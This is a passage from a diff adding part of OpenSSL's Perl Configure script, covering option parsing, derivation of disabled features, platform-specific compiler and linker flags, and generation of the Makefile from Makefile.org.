+		s /^sctp$/enable-sctp/;
+		s /^threads$/enable-threads/;
+		s /^zlib$/enable-zlib/;
+		s /^zlib-dynamic$/enable-zlib-dynamic/;
+
+		if (/^no-(.+)$/ || /^disable-(.+)$/)
+			{
+			if (!($disabled{$1} eq "experimental"))
+				{
+				if ($1 eq "ssl")
+					{
+					$disabled{"ssl2"} = "option(ssl)";
+					$disabled{"ssl3"} = "option(ssl)";
+					}
+				elsif ($1 eq "tls")
+					{
+					$disabled{"tls1"} = "option(tls)"
+					}
+				elsif ($1 eq "ssl3-method")
+					{
+					$disabled{"ssl3-method"} = "option(ssl)";
+					$disabled{"ssl3"} = "option(ssl)";
+					}
+				else
+					{
+					$disabled{$1} = "option";
+					}
+				}			
+			}
+		elsif (/^enable-(.+)$/ || /^experimental-(.+)$/)
+			{
+			my $algo = $1;
+			if ($disabled{$algo} eq "experimental")
+				{
+				die "You are requesting an experimental feature; please say 'experimental-$algo' if you are sure\n"
+					unless (/^experimental-/);
+				push @experimental, $algo;
+				}
+			delete $disabled{$algo};
+
+			$threads = 1 if ($algo eq "threads");
+			}
+		elsif (/^--test-sanity$/)
+			{
+			exit(&test_sanity());
+			}
+		elsif (/^--strict-warnings/)
+			{
+			$strict_warnings = 1;
+			}
+		elsif (/^reconfigure/ || /^reconf/)
+			{
+			if (open(IN,"<$Makefile"))
+				{
+				while (<IN>)
+					{
+					chomp;
+					if (/^CONFIGURE_ARGS=(.*)/)
+						{
+						$argvstring=$1;
+						@argvcopy=split(' ',$argvstring);
+						die "Incorrect data to reconfigure, please do a normal configuration\n"
+							if (grep(/^reconf/,@argvcopy));
+						print "Reconfiguring with: $argvstring\n";
+						$argv_unprocessed=1;
+						close(IN);
+						last PROCESS_ARGS;
+						}
+					}
+				close(IN);
+				}
+			die "Insufficient data to reconfigure, please do a normal configuration\n";
+			}
+		elsif (/^386$/)
+			{ $processor=386; }
+		elsif (/^fips$/)
+			{
+			$fips=1;
+			}
+		elsif (/^rsaref$/)
+			{
+			# No RSAref support any more since it's not needed.
+			# The check for the option is there so scripts aren't
+			# broken
+			}
+		elsif (/^[-+]/)
+			{
+			if (/^--prefix=(.*)$/)
+				{
+				$prefix=$1;
+				}
+			elsif (/^--libdir=(.*)$/)
+				{
+				$libdir=$1;
+				}
+			elsif (/^--openssldir=(.*)$/)
+				{
+				$openssldir=$1;
+				}
+			elsif (/^--install.prefix=(.*)$/)
+				{
+				$install_prefix=$1;
+				}
+			elsif (/^--with-krb5-(dir|lib|include|flavor)=(.*)$/)
+				{
+				$withargs{"krb5-".$1}=$2;
+				}
+			elsif (/^--with-zlib-lib=(.*)$/)
+				{
+				$withargs{"zlib-lib"}=$1;
+				}
+			elsif (/^--with-zlib-include=(.*)$/)
+				{
+				$withargs{"zlib-include"}="-I$1";
+				}
+			elsif (/^--with-fipsdir=(.*)$/)
+				{
+				$fipsdir="$1";
+				}
+			elsif (/^--with-fipslibdir=(.*)$/)
+				{
+				$fipslibdir="$1";
+				}
+			elsif (/^--with-baseaddr=(.*)$/)
+				{
+				$baseaddr="$1";
+				}
+			elsif (/^--cross-compile-prefix=(.*)$/)
+				{
+				$cross_compile_prefix=$1;
+				}
+			elsif (/^-[lL](.*)$/ or /^-Wl,/)
+				{
+				$libs.=$_." ";
+				}
+			else	# common if (/^[-+]/), just pass down...
+				{
+				$_ =~ s/%([0-9a-f]{1,2})/chr(hex($1))/gei;
+				$flags.=$_." ";
+				}
+			}
+		elsif ($_ =~ /^([^:]+):(.+)$/)
+			{
+			eval "\$table{\$1} = \"$2\""; # allow $xxx constructs in the string
+			$target=$1;
+			}
+		else
+			{
+			die "target already defined - $target (offending arg: $_)\n" if ($target ne "");
+			$target=$_;
+			}
+
+		unless ($_ eq $target || /^no-/ || /^disable-/)
+			{
+			# "no-..." follows later after implied disactivations
+			# have been derived.  (Don't take this too seroiusly,
+			# we really only write OPTIONS to the Makefile out of
+			# nostalgia.)
+
+			if ($options eq "")
+				{ $options = $_; }
+			else
+				{ $options .= " ".$_; }
+			}
+		}
+	}
+
+
+
+if ($processor eq "386")
+	{
+	$disabled{"sse2"} = "forced";
+	}
+
+if (!defined($withargs{"krb5-flavor"}) || $withargs{"krb5-flavor"} eq "")
+	{
+	$disabled{"krb5"} = "krb5-flavor not specified";
+	}
+
+if (!defined($disabled{"zlib-dynamic"}))
+	{
+	# "zlib-dynamic" was specifically enabled, so enable "zlib"
+	delete $disabled{"zlib"};
+	}
+
+if (defined($disabled{"rijndael"}))
+	{
+	$disabled{"aes"} = "forced";
+	}
+if (defined($disabled{"des"}))
+	{
+	$disabled{"mdc2"} = "forced";
+	}
+if (defined($disabled{"ec"}))
+	{
+	$disabled{"ecdsa"} = "forced";
+	$disabled{"ecdh"} = "forced";
+	}
+
+# SSL 2.0 requires MD5 and RSA
+if (defined($disabled{"md5"}) || defined($disabled{"rsa"}))
+	{
+	$disabled{"ssl2"} = "forced";
+	}
+
+if ($fips && $fipslibdir eq "")
+	{
+	$fipslibdir = $fipsdir . "/lib/";
+	}
+
+# RSAX ENGINE sets default non-FIPS RSA method.
+if ($fips)
+	{
+	$disabled{"rsax"} = "forced";
+	}
+
+# SSL 3.0 and TLS requires MD5 and SHA and either RSA or DSA+DH
+if (defined($disabled{"md5"}) || defined($disabled{"sha"})
+    || (defined($disabled{"rsa"})
+        && (defined($disabled{"dsa"}) || defined($disabled{"dh"}))))
+	{
+	$disabled{"ssl3"} = "forced";
+	$disabled{"tls1"} = "forced";
+	}
+
+if (defined($disabled{"tls1"}))
+	{
+	$disabled{"tlsext"} = "forced";
+	}
+
+if (defined($disabled{"ec"}) || defined($disabled{"dsa"})
+    || defined($disabled{"dh"}))
+	{
+	$disabled{"gost"} = "forced";
+	}
+
+# SRP and HEARTBEATS require TLSEXT
+if (defined($disabled{"tlsext"}))
+	{
+	$disabled{"srp"} = "forced";
+	$disabled{"heartbeats"} = "forced";
+	}
+
+if ($target eq "TABLE") {
+	foreach $target (sort keys %table) {
+		print_table_entry($target);
+	}
+	exit 0;
+}
+
+if ($target eq "LIST") {
+	foreach (sort keys %table) {
+		print;
+		print "\n";
+	}
+	exit 0;
+}
+
+if ($target =~ m/^CygWin32(-.*)$/) {
+	$target = "Cygwin".$1;
+}
+
+print "Configuring for $target\n";
+
+&usage if (!defined($table{$target}));
+
+
+foreach (sort (keys %disabled))
+	{
+	$options .= " no-$_";
+
+	printf "    no-%-12s %-10s", $_, "[$disabled{$_}]";
+
+	if (/^dso$/)
+		{ $no_dso = 1; }
+	elsif (/^threads$/)
+		{ $no_threads = 1; }
+	elsif (/^shared$/)
+		{ $no_shared = 1; }
+	elsif (/^zlib$/)
+		{ $zlib = 0; }
+	elsif (/^static-engine$/)
+		{ }
+	elsif (/^zlib-dynamic$/)
+		{ }
+	elsif (/^symlinks$/)
+		{ $symlink = 0; }
+	elsif (/^sse2$/)
+		{ $no_sse2 = 1; }
+	else
+		{
+		my ($ALGO, $algo);
+		($ALGO = $algo = $_) =~ tr/[\-a-z]/[_A-Z]/;
+
+		if (/^asm$/ || /^err$/ || /^hw$/ || /^hw-/)
+			{
+			$openssl_other_defines .= "#define OPENSSL_NO_$ALGO\n";
+			print " OPENSSL_NO_$ALGO";
+		
+			if (/^err$/)	{ $flags .= "-DOPENSSL_NO_ERR "; }
+			elsif (/^asm$/)	{ $no_asm = 1; }
+			}
+		else
+			{
+			$openssl_algorithm_defines .= "#define OPENSSL_NO_$ALGO\n";
+			print " OPENSSL_NO_$ALGO";
+
+			if (/^krb5$/)
+				{ $no_krb5 = 1; }
+			else
+				{
+				push @skip, $algo;
+				# fix-up crypto/directory name(s)
+				@skip[$#skip]="whrlpool" if $algo eq "whirlpool";
+				print " (skip dir)";
+
+				$depflags .= " -DOPENSSL_NO_$ALGO";
+				}
+			}
+		}
+
+	print "\n";
+	}
+
+my $exp_cflags = "";
+foreach (sort @experimental)
+	{
+	my $ALGO;
+	($ALGO = $_) =~ tr/[a-z]/[A-Z]/;
+
+	# opensslconf.h will set OPENSSL_NO_... unless OPENSSL_EXPERIMENTAL_... is defined
+	$openssl_experimental_defines .= "#define OPENSSL_NO_$ALGO\n";
+	$exp_cflags .= " -DOPENSSL_EXPERIMENTAL_$ALGO";
+	}
+
+my $IsMK1MF=scalar grep /^$target$/,@MK1MF_Builds;
+
+$exe_ext=".exe" if ($target eq "Cygwin" || $target eq "DJGPP" || $target =~ /^mingw/);
+$exe_ext=".nlm" if ($target =~ /netware/);
+$exe_ext=".pm"  if ($target =~ /vos/);
+$openssldir="/usr/local/ssl" if ($openssldir eq "" and $prefix eq "");
+$prefix=$openssldir if $prefix eq "";
+
+$default_ranlib= &which("ranlib") or $default_ranlib="true";
+$perl=$ENV{'PERL'} or $perl=&which("perl5") or $perl=&which("perl")
+  or $perl="perl";
+my $make = $ENV{'MAKE'} || "make";
+
+$cross_compile_prefix=$ENV{'CROSS_COMPILE'} if $cross_compile_prefix eq "";
+
+chop $openssldir if $openssldir =~ /\/$/;
+chop $prefix if $prefix =~ /.\/$/;
+
+$openssldir=$prefix . "/ssl" if $openssldir eq "";
+$openssldir=$prefix . "/" . $openssldir if $openssldir !~ /(^\/|^[a-zA-Z]:[\\\/])/;
+
+
+print "IsMK1MF=$IsMK1MF\n";
+
+my @fields = split(/\s*:\s*/,$table{$target} . ":" x 30 , -1);
+my $cc = $fields[$idx_cc];
+# Allow environment CC to override compiler...
+if($ENV{CC}) {
+    $cc = $ENV{CC};
+}
+my $cflags = $fields[$idx_cflags];
+my $unistd = $fields[$idx_unistd];
+my $thread_cflag = $fields[$idx_thread_cflag];
+my $sys_id = $fields[$idx_sys_id];
+my $lflags = $fields[$idx_lflags];
+my $bn_ops = $fields[$idx_bn_ops];
+my $cpuid_obj = $fields[$idx_cpuid_obj];
+my $bn_obj = $fields[$idx_bn_obj];
+my $ec_obj = $fields[$idx_ec_obj];
+my $des_obj = $fields[$idx_des_obj];
+my $aes_obj = $fields[$idx_aes_obj];
+my $bf_obj = $fields[$idx_bf_obj];
+my $md5_obj = $fields[$idx_md5_obj];
+my $sha1_obj = $fields[$idx_sha1_obj];
+my $cast_obj = $fields[$idx_cast_obj];
+my $rc4_obj = $fields[$idx_rc4_obj];
+my $rmd160_obj = $fields[$idx_rmd160_obj];
+my $rc5_obj = $fields[$idx_rc5_obj];
+my $wp_obj = $fields[$idx_wp_obj];
+my $cmll_obj = $fields[$idx_cmll_obj];
+my $modes_obj = $fields[$idx_modes_obj];
+my $engines_obj = $fields[$idx_engines_obj];
+my $perlasm_scheme = $fields[$idx_perlasm_scheme];
+my $dso_scheme = $fields[$idx_dso_scheme];
+my $shared_target = $fields[$idx_shared_target];
+my $shared_cflag = $fields[$idx_shared_cflag];
+my $shared_ldflag = $fields[$idx_shared_ldflag];
+my $shared_extension = $fields[$idx_shared_extension];
+my $ranlib = $ENV{'RANLIB'} || $fields[$idx_ranlib];
+my $ar = $ENV{'AR'} || "ar";
+my $arflags = $fields[$idx_arflags];
+my $multilib = $fields[$idx_multilib];
+
+# if $prefix/lib$multilib is not an existing directory, then
+# assume that it's not searched by linker automatically, in
+# which case adding $multilib suffix causes more grief than
+# we're ready to tolerate, so don't...
+$multilib="" if !-d "$prefix/lib$multilib";
+
+$libdir="lib$multilib" if $libdir eq "";
+
+$cflags = "$cflags$exp_cflags";
+
+# '%' in $lflags is used to split flags to "pre-" and post-flags
+my ($prelflags,$postlflags)=split('%',$lflags);
+if (defined($postlflags))	{ $lflags=$postlflags;	}
+else				{ $lflags=$prelflags; undef $prelflags;	}
+
+if ($target =~ /^mingw/ && `$cc --target-help 2>&1` !~ m/\-mno\-cygwin/m)
+	{
+	$cflags =~ s/\-mno\-cygwin\s*//;
+	$shared_ldflag =~ s/\-mno\-cygwin\s*//;
+	}
+
+if ($target =~ /linux.*\-mips/ && !$no_asm && $flags !~ /\-m(ips|arch=)/) {
+	# minimally required architecture flags for assembly modules
+	$cflags="-mips2 $cflags" if ($target =~ /mips32/);
+	$cflags="-mips3 $cflags" if ($target =~ /mips64/);
+}
+
+my $no_shared_warn=0;
+my $no_user_cflags=0;
+
+if ($flags ne "")	{ $cflags="$flags$cflags"; }
+else			{ $no_user_cflags=1;       }
+
+# Kerberos settings.  The flavor must be provided from outside, either through
+# the script "config" or manually.
+if (!$no_krb5)
+	{
+	my ($lresolv, $lpath, $lext);
+	if ($withargs{"krb5-flavor"} =~ /^[Hh]eimdal$/)
+		{
+		die "Sorry, Heimdal is currently not supported\n";
+		}
+	##### HACK to force use of Heimdal.
+	##### WARNING: Since we don't really have adequate support for Heimdal,
+	#####          using this will break the build.  You'll have to make
+	#####          changes to the source, and if you do, please send
+	#####          patches to openssl-dev@openssl.org
+	if ($withargs{"krb5-flavor"} =~ /^force-[Hh]eimdal$/)
+		{
+		warn "Heimdal isn't really supported.  Your build WILL break\n";
+		warn "If you fix the problems, please send a patch to openssl-dev\@openssl.org\n";
+		$withargs{"krb5-dir"} = "/usr/heimdal"
+			if $withargs{"krb5-dir"} eq "";
+		$withargs{"krb5-lib"} = "-L".$withargs{"krb5-dir"}.
+			"/lib -lgssapi -lkrb5 -lcom_err"
+			if $withargs{"krb5-lib"} eq "" && !$IsMK1MF;
+		$cflags="-DKRB5_HEIMDAL $cflags";
+		}
+	if ($withargs{"krb5-flavor"} =~ /^[Mm][Ii][Tt]/)
+		{
+		$withargs{"krb5-dir"} = "/usr/kerberos"
+			if $withargs{"krb5-dir"} eq "";
+		$withargs{"krb5-lib"} = "-L".$withargs{"krb5-dir"}.
+			"/lib -lgssapi_krb5 -lkrb5 -lcom_err -lk5crypto"
+			if $withargs{"krb5-lib"} eq "" && !$IsMK1MF;
+		$cflags="-DKRB5_MIT $cflags";
+		$withargs{"krb5-flavor"} =~ s/^[Mm][Ii][Tt][._-]*//;
+		if ($withargs{"krb5-flavor"} =~ /^1[._-]*[01]/)
+			{
+			$cflags="-DKRB5_MIT_OLD11 $cflags";
+			}
+		}
+	LRESOLV:
+	foreach $lpath ("/lib", "/usr/lib")
+		{
+		foreach $lext ("a", "so")
+			{
+			$lresolv = "$lpath/libresolv.$lext";
+			last LRESOLV	if (-r "$lresolv");
+			$lresolv = "";
+			}
+		}
+	$withargs{"krb5-lib"} .= " -lresolv"
+		if ("$lresolv" ne "");
+	$withargs{"krb5-include"} = "-I".$withargs{"krb5-dir"}."/include"
+		if $withargs{"krb5-include"} eq "" &&
+		   $withargs{"krb5-dir"} ne "";
+	}
+
+# The DSO code currently always implements all functions so that no
+# applications will have to worry about that from a compilation point
+# of view. However, the "method"s may return zero unless that platform
+# has support compiled in for them. Currently each method is enabled
+# by a define "DSO_<name>" ... we translate the "dso_scheme" config
+# string entry into using the following logic;
+my $dso_cflags;
+if (!$no_dso && $dso_scheme ne "")
+	{
+	$dso_scheme =~ tr/[a-z]/[A-Z]/;
+	if ($dso_scheme eq "DLFCN")
+		{
+		$dso_cflags = "-DDSO_DLFCN -DHAVE_DLFCN_H";
+		}
+	elsif ($dso_scheme eq "DLFCN_NO_H")
+		{
+		$dso_cflags = "-DDSO_DLFCN";
+		}
+	else
+		{
+		$dso_cflags = "-DDSO_$dso_scheme";
+		}
+	$cflags = "$dso_cflags $cflags";
+	}
+
+my $thread_cflags;
+my $thread_defines;
+if ($thread_cflag ne "(unknown)" && !$no_threads)
+	{
+	# If we know how to do it, support threads by default.
+	$threads = 1;
+	}
+if ($thread_cflag eq "(unknown)" && $threads)
+	{
+	# If the user asked for "threads", [s]he is also expected to
+	# provide any system-dependent compiler options that are
+	# necessary.
+	if ($no_user_cflags)
+		{
+		print "You asked for multi-threading support, but didn't\n";
+		print "provide any system-specific compiler options\n";
+		exit(1);
+		}
+	$thread_cflags="-DOPENSSL_THREADS $cflags" ;
+	$thread_defines .= "#define OPENSSL_THREADS\n";
+	}
+else
+	{
+	$thread_cflags="-DOPENSSL_THREADS $thread_cflag $cflags";
+	$thread_defines .= "#define OPENSSL_THREADS\n";
+#	my $def;
+#	foreach $def (split ' ',$thread_cflag)
+#		{
+#		if ($def =~ s/^-D// && $def !~ /^_/)
+#			{
+#			$thread_defines .= "#define $def\n";
+#			}
+#		}
+	}	
+
+$lflags="$libs$lflags" if ($libs ne "");
+
+if ($no_asm)
+	{
+	$cpuid_obj=$bn_obj=$ec_obj=
+	$des_obj=$aes_obj=$bf_obj=$cast_obj=$rc4_obj=$rc5_obj=$cmll_obj=
+	$modes_obj=$sha1_obj=$md5_obj=$rmd160_obj=$wp_obj=$engines_obj="";
+	}
+
+if (!$no_shared)
+	{
+	$cast_obj="";	# CAST assembler is not PIC
+	}
+
+if ($threads)
+	{
+	$cflags=$thread_cflags;
+	$openssl_thread_defines .= $thread_defines;
+	}
+
+if ($zlib)
+	{
+	$cflags = "-DZLIB $cflags";
+	if (defined($disabled{"zlib-dynamic"}))
+		{
+		if (defined($withargs{"zlib-lib"}))
+			{
+			$lflags = "$lflags -L" . $withargs{"zlib-lib"} . " -lz";
+			}
+		else
+			{
+			$lflags = "$lflags -lz";
+			}
+		}
+	else
+		{
+		$cflags = "-DZLIB_SHARED $cflags";
+		}
+	}
+
+# You will find shlib_mark1 and shlib_mark2 explained in Makefile.org
+my $shared_mark = "";
+if ($shared_target eq "")
+	{
+	$no_shared_warn = 1 if !$no_shared;
+	$no_shared = 1;
+	}
+if (!$no_shared)
+	{
+	if ($shared_cflag ne "")
+		{
+		$cflags = "$shared_cflag -DOPENSSL_PIC $cflags";
+		}
+	}
+
+if (!$IsMK1MF)
+	{
+	# add {no-}static-engine to options to allow mkdef.pl to work without extra arguments
+	if ($no_shared)
+		{
+		$openssl_other_defines.="#define OPENSSL_NO_DYNAMIC_ENGINE\n";
+		$options.=" static-engine";
+		}
+	else
+		{
+		$openssl_other_defines.="#define OPENSSL_NO_STATIC_ENGINE\n";
+		$options.=" no-static-engine";
+		}
+	}
+
+$cpuid_obj.=" uplink.o uplink-x86.o" if ($cflags =~ /\-DOPENSSL_USE_APPLINK/);
+
+#
+# Platform fix-ups
+#
+if ($target =~ /\-icc$/)	# Intel C compiler
+	{
+	my $iccver=0;
+	if (open(FD,"$cc -V 2>&1 |"))
+		{
+		while(<FD>) { $iccver=$1 if (/Version ([0-9]+)\./); }
+		close(FD);
+		}
+	if ($iccver>=8)
+		{
+		$cflags=~s/\-KPIC/-fPIC/;
+		# Eliminate unnecessary dependency from libirc.a. This is
+		# essential for shared library support, as otherwise
+		# apps/openssl can end up in endless loop upon startup...
+		$cflags.=" -Dmemcpy=__builtin_memcpy -Dmemset=__builtin_memset";
+		}
+	if ($iccver>=9)
+		{
+		$lflags.=" -i-static";
+		$lflags=~s/\-no_cpprt/-no-cpprt/;
+		}
+	if ($iccver>=10)
+		{
+		$lflags=~s/\-i\-static/-static-intel/;
+		}
+	if ($iccver>=11)
+		{
+		$cflags.=" -no-intel-extensions";	# disable Cilk
+		$lflags=~s/\-no\-cpprt/-no-cxxlib/;
+		}
+	}
+
+# Unlike other OSes (like Solaris, Linux, Tru64, IRIX) BSD run-time
+# linkers (tested OpenBSD, NetBSD and FreeBSD) "demand" RPATH set on
+# .so objects. Apparently application RPATH is not global and does
+# not apply to .so linked with other .so. Problem manifests itself
+# when libssl.so fails to load libcrypto.so. One can argue that we
+# should engrave this into Makefile.shared rules or into BSD-* config
+# lines above. Meanwhile let's try to be cautious and pass -rpath to
+# linker only when --prefix is not /usr.
+if ($target =~ /^BSD\-/)
+	{
+	$shared_ldflag.=" -Wl,-rpath,\$(LIBRPATH)" if ($prefix !~ m|^/usr[/]*$|);
+	}
+
+if ($sys_id ne "")
+	{
+	#$cflags="-DOPENSSL_SYSNAME_$sys_id $cflags";
+	$openssl_sys_defines="#define OPENSSL_SYSNAME_$sys_id\n";
+	}
+
+if ($ranlib eq "")
+	{
+	$ranlib = $default_ranlib;
+	}
+
+#my ($bn1)=split(/\s+/,$bn_obj);
+#$bn1 = "" unless defined $bn1;
+#$bn1=$bn_asm unless ($bn1 =~ /\.o$/);
+#$bn_obj="$bn1";
+
+$cpuid_obj="" if ($processor eq "386");
+
+$bn_obj = $bn_asm unless $bn_obj ne "";
+# bn-586 is the only one implementing bn_*_part_words
+$cflags.=" -DOPENSSL_BN_ASM_PART_WORDS" if ($bn_obj =~ /bn-586/);
+$cflags.=" -DOPENSSL_IA32_SSE2" if (!$no_sse2 && $bn_obj =~ /86/);
+
+$cflags.=" -DOPENSSL_BN_ASM_MONT" if ($bn_obj =~ /-mont/);
+$cflags.=" -DOPENSSL_BN_ASM_MONT5" if ($bn_obj =~ /-mont5/);
+$cflags.=" -DOPENSSL_BN_ASM_GF2m" if ($bn_obj =~ /-gf2m/);
+
+if ($fips)
+	{
+	$openssl_other_defines.="#define OPENSSL_FIPS\n";
+	$cflags .= " -I\$(FIPSDIR)/include";
+	}
+
+$cpuid_obj="mem_clr.o"	unless ($cpuid_obj =~ /\.o$/);
+$des_obj=$des_enc	unless ($des_obj =~ /\.o$/);
+$bf_obj=$bf_enc		unless ($bf_obj =~ /\.o$/);
+$cast_obj=$cast_enc	unless ($cast_obj =~ /\.o$/);
+$rc4_obj=$rc4_enc	unless ($rc4_obj =~ /\.o$/);
+$rc5_obj=$rc5_enc	unless ($rc5_obj =~ /\.o$/);
+if ($sha1_obj =~ /\.o$/)
+	{
+#	$sha1_obj=$sha1_enc;
+	$cflags.=" -DSHA1_ASM"   if ($sha1_obj =~ /sx86/ || $sha1_obj =~ /sha1/);
+	$cflags.=" -DSHA256_ASM" if ($sha1_obj =~ /sha256/);
+	$cflags.=" -DSHA512_ASM" if ($sha1_obj =~ /sha512/);
+	if ($sha1_obj =~ /sse2/)
+	    {	if ($no_sse2)
+		{   $sha1_obj =~ s/\S*sse2\S+//;        }
+		elsif ($cflags !~ /OPENSSL_IA32_SSE2/)
+		{   $cflags.=" -DOPENSSL_IA32_SSE2";    }
+	    }
+	}
+if ($md5_obj =~ /\.o$/)
+	{
+#	$md5_obj=$md5_enc;
+	$cflags.=" -DMD5_ASM";
+	}
+if ($rmd160_obj =~ /\.o$/)
+	{
+#	$rmd160_obj=$rmd160_enc;
+	$cflags.=" -DRMD160_ASM";
+	}
+if ($aes_obj =~ /\.o$/)
+	{
+	$cflags.=" -DAES_ASM" if ($aes_obj =~ m/\baes\-/);;
+	# aes-ctr.o is not a real file, only indication that assembler
+	# module implements AES_ctr32_encrypt...
+	$cflags.=" -DAES_CTR_ASM" if ($aes_obj =~ s/\s*aes\-ctr\.o//);
+	# aes-xts.o indicates presense of AES_xts_[en|de]crypt...
+	$cflags.=" -DAES_XTS_ASM" if ($aes_obj =~ s/\s*aes\-xts\.o//);
+	$aes_obj =~ s/\s*(vpaes|aesni)\-x86\.o//g if ($no_sse2);
+	$cflags.=" -DVPAES_ASM" if ($aes_obj =~ m/vpaes/);
+	$cflags.=" -DBSAES_ASM" if ($aes_obj =~ m/bsaes/);
+	}
+else	{
+	$aes_obj=$aes_enc;
+	}
+$wp_obj="" if ($wp_obj =~ /mmx/ && $processor eq "386");
+if ($wp_obj =~ /\.o$/ && !$disabled{"whirlpool"})
+	{
+	$cflags.=" -DWHIRLPOOL_ASM";
+	}
+else	{
+	$wp_obj="wp_block.o";
+	}
+$cmll_obj=$cmll_enc	unless ($cmll_obj =~ /.o$/);
+if ($modes_obj =~ /ghash\-/)
+	{
+	$cflags.=" -DGHASH_ASM";
+	}
+if ($ec_obj =~ /ecp_nistz256/)
+	{
+	$cflags.=" -DECP_NISTZ256_ASM";
+	}
+
+# "Stringify" the C flags string.  This permits it to be made part of a string
+# and works as well on command lines.
+$cflags =~ s/([\\\"])/\\\1/g;
+
+my $version = "unknown";
+my $version_num = "unknown";
+my $major = "unknown";
+my $minor = "unknown";
+my $shlib_version_number = "unknown";
+my $shlib_version_history = "unknown";
+my $shlib_major = "unknown";
+my $shlib_minor = "unknown";
+
+open(IN,'<crypto/opensslv.h') || die "unable to read opensslv.h:$!\n";
+while (<IN>)
+	{
+	$version=$1 if /OPENSSL.VERSION.TEXT.*OpenSSL (\S+) /;
+	$version_num=$1 if /OPENSSL.VERSION.NUMBER.*0x(\S+)/;
+	$shlib_version_number=$1 if /SHLIB_VERSION_NUMBER *"([^"]+)"/;
+	$shlib_version_history=$1 if /SHLIB_VERSION_HISTORY *"([^"]*)"/;
+	}
+close(IN);
+if ($shlib_version_history ne "") { $shlib_version_history .= ":"; }
+
+if ($version =~ /(^[0-9]*)\.([0-9\.]*)/)
+	{
+	$major=$1;
+	$minor=$2;
+	}
+
+if ($shlib_version_number =~ /(^[0-9]*)\.([0-9\.]*)/)
+	{
+	$shlib_major=$1;
+	$shlib_minor=$2;
+	}
+
+if ($strict_warnings)
+	{
+	my $wopt;
+	die "ERROR --strict-warnings requires gcc or clang" unless ($cc =~ /gcc$/ or $cc =~ /clang$/);
+	foreach $wopt (split /\s+/, $gcc_devteam_warn)
+		{
+		$cflags .= " $wopt" unless ($cflags =~ /$wopt/)
+		}
+	}
+
+open(IN,'<Makefile.org') || die "unable to read Makefile.org:$!\n";
+unlink("$Makefile.new") || die "unable to remove old $Makefile.new:$!\n" if -e "$Makefile.new";
+open(OUT,">$Makefile.new") || die "unable to create $Makefile.new:$!\n";
+print OUT "### Generated automatically from Makefile.org by Configure.\n\n";
+my $sdirs=0;
+while (<IN>)
+	{
+	chomp;
+	$sdirs = 1 if /^SDIRS=/;
+	if ($sdirs) {
+		my $dir;
+		foreach $dir (@skip) {
+			s/(\s)$dir /$1/;
+			s/\s$dir$//;
+			}
+		}
+	$sdirs = 0 unless /\\$/;
+        s/engines // if (/^DIRS=/ && $disabled{"engine"});
+	s/ccgost// if (/^ENGDIRS=/ && $disabled{"gost"});
+	s/^VERSION=.*/VERSION=$version/;
+	s/^MAJOR=.*/MAJOR=$major/;
+	s/^MINOR=.*/MINOR=$minor/;
+	s/^SHLIB_VERSION_NUMBER=.*/SHLIB_VERSION_NUMBER=$shlib_version_number/;
+	s/^SHLIB_VERSION_HISTORY=.*/SHLIB_VERSION_HISTORY=$shlib_version_history/;
+	s/^SHLIB_MAJOR=.*/SHLIB_MAJOR=$shlib_major/;
+	s/^SHLIB_MINOR=.*/SHLIB_MINOR=$shlib_minor/;
+	s/^SHLIB_EXT=.*/SHLIB_EXT=$shared_extension/;
+	s/^INSTALLTOP=.*$/INSTALLTOP=$prefix/;
+	s/^MULTILIB=.*$/MULTILIB=$multilib/;
+	s/^OPENSSLDIR=.*$/OPENSSLDIR=$openssldir/;
+	s/^LIBDIR=.*$/LIBDIR=$libdir/;
+	s/^INSTALL_PREFIX=.*$/INSTALL_PREFIX=$install_prefix/;
+	s/^PLATFORM=.*$/PLATFORM=$target/;
+	s/^OPTIONS=.*$/OPTIONS=$options/;
+	s/^CONFIGURE_ARGS=.*$/CONFIGURE_ARGS=$argvstring/;
+	if ($cross_compile_prefix)
+		{
+		s/^CC=.*$/CROSS_COMPILE= $cross_compile_prefix\nCC= \$\(CROSS_COMPILE\)$cc/;
+		s/^AR=\s*/AR= \$\(CROSS_COMPILE\)/;
+		s/^NM=\s*/NM= \$\(CROSS_COMPILE\)/;
+		s/^RANLIB=\s*/RANLIB= \$\(CROSS_COMPILE\)/;
+		s/^MAKEDEPPROG=.*$/MAKEDEPPROG= \$\(CROSS_COMPILE\)$cc/ if $cc eq "gcc";
+		}
+	else	{
+		s/^CC=.*$/CC= $cc/;
+		s/^AR=\s*ar/AR= $ar/;
+		s/^RANLIB=.*/RANLIB= $ranlib/;
+		s/^MAKEDEPPROG=.*$/MAKEDEPPROG= $cc/ if $cc eq "gcc";
+		}
+	s/^CFLAG=.*$/CFLAG= $cflags/;
+	s/^DEPFLAG=.*$/DEPFLAG=$depflags/;
+	s/^PEX_LIBS=.*$/PEX_LIBS= $prelflags/;
+	s/^EX_LIBS=.*$/EX_LIBS= $lflags/;
+	s/^EXE_EXT=.*$/EXE_EXT= $exe_ext/;
+	s/^CPUID_OBJ=.*$/CPUID_OBJ= $cpuid_obj/;
+	s/^BN_ASM=.*$/BN_ASM= $bn_obj/;
+	s/^EC_ASM=.*$/EC_ASM= $ec_obj/;
+	s/^DES_ENC=.*$/DES_ENC= $des_obj/;
+	s/^AES_ENC=.*$/AES_ENC= $aes_obj/;
+	s/^BF_ENC=.*$/BF_ENC= $bf_obj/;
+	s/^CAST_ENC=.*$/CAST_ENC= $cast_obj/;
+	s/^RC4_ENC=.*$/RC4_ENC= $rc4_obj/;
+	s/^RC5_ENC=.*$/RC5_ENC= $rc5_obj/;
+	s/^MD5_ASM_OBJ=.*$/MD5_ASM_OBJ= $md5_obj/;
+	s/^SHA1_ASM_OBJ=.*$/SHA1_ASM_OBJ= $sha1_obj/;
+	s/^RMD160_ASM_OBJ=.*$/RMD160_ASM_OBJ= $rmd160_obj/;
+	s/^WP_ASM_OBJ=.*$/WP_ASM_OBJ= $wp_obj/;
+	s/^CMLL_ENC=.*$/CMLL_ENC= $cmll_obj/;
+	s/^MODES_ASM_OBJ.=*$/MODES_ASM_OBJ= $modes_obj/;
+	s/^ENGINES_ASM_OBJ.=*$/ENGINES_ASM_OBJ= $engines_obj/;
+	s/^PERLASM_SCHEME=.*$/PERLASM_SCHEME= $perlasm_scheme/;
+	s/^PROCESSOR=.*/PROCESSOR= $processor/;
+	s/^ARFLAGS=.*/ARFLAGS= $arflags/;
+	s/^PERL=.*/PERL= $perl/;
+	s/^KRB5_INCLUDES=.*/KRB5_INCLUDES=$withargs{"krb5-include"}/;
+	s/^LIBKRB5=.*/LIBKRB5=$withargs{"krb5-lib"}/;
+	s/^LIBZLIB=.*/LIBZLIB=$withargs{"zlib-lib"}/;
+	s/^ZLIB_INCLUDE=.*/ZLIB_INCLUDE=$withargs{"zlib-include"}/;
+
